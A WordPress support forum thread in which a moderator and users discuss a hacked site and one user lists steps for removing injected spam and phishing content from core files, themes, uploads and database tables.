Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
If so, what was the intent of the hacker?
To spam and get links on your site. It’s always that, they’re looking to make money from those links.
Carefully follow this guide to delouse your site. Until you do so someone else will walk in and add more malware code.
When you’re done, you may want to implement some (if not all) of the recommended security measures.
I’m having the same problem, did you finally find a solution?
Yes, we eventually found a solution. In our case, the hack was on the server level which is why the hack was so wide spread and our cleanups were ineffective. We had no choice but to migrate to new hosts since our original host did little to nothing as far as support went and we didn’t have direct access to the server so there was nothing we could do.
I would contact your hosting provider first and make sure they aren’t having issues. The final goal of this particular hack in our case was to use your site(s) for phishing scams, so I recommend you take care of it as soon as possible.
If you have a clean backup use that instead of the steps below and update all plugins/themes since an outdated theme/plugin is probably how they got through in the first place. If you don’t have a backup (you poor soul), you can follow the steps below, but keep in mind I’m not going into a ton of detail with each step and am not liable if you break your site.
To cleanup each site that didn’t have a backup we had to:
1. BACK UP THE ENTIRETY OF THE COMPROMISED SITE IN CASE YOU BREAK IT!! That includes all files and your database.
2. Re install fresh core files
3. Re install fresh plugin files
4. Scan the entirety of the old theme for any signs of a hack. Delete any bad files/code and re-upload the cleaned version. The 404.php and header.php files were big offenders
5. Search through the uploads folder for any bad files. Remove them and re upload your now cleaned uploads folder onto the site
6. Delete any unused themes or plugins
7. Scan the database for any signs of the hack, here were the problem areas:
– wp_users table: make sure to change the username and password for each user no matter what. I did all this manually in the database
– wp_posts table: look out for any posts not made by you. They are easy to spot and generally reference Cialis or porn
– wp_options table: The hackers generally inject HTML into the “blogdescription”
This doesn’t guarantee anything however, we have not seen a hack come back yet on our new server (knock on wood). Here’s some WordPress documentation on cleaning hacks if you need further assistance: https://codex.wordpress.org/FAQ_My_site_was_hacked. Hopefully this helps, good luck.
Thank you very much for your detailed answer. From my initial message, I moved the account to a new server and the accounts are there without problems. Let’s see what happend! thank you.
